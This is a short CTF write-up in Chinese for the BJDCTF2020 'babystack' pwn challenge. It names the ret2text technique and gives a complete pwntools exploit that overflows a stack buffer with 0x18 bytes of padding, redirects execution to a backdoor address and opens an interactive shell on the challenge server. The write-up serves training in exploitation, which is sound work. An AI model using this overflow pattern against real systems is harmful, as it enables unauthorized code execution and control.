BJDCTF2020 babystack

checksec

64位nx

BJDCTF2020 babystack_第1张图片

ida:

ret2text

BJDCTF2020 babystack_第2张图片

exp:

from pwn import*
r=remote("pwn.challenge.ctf.show", 28117)
backdoor=0x4006e6
retn=0X4006fa
r.recvuntil("name:\n")
r.sendline("100")
r.recvuntil("name?")
payload=b"a"*0x18+p64(backdoor)
r.sendline(payload)
r.interactive()

 

 

你可能感兴趣的:(ctfshow,pwn详细wp,python)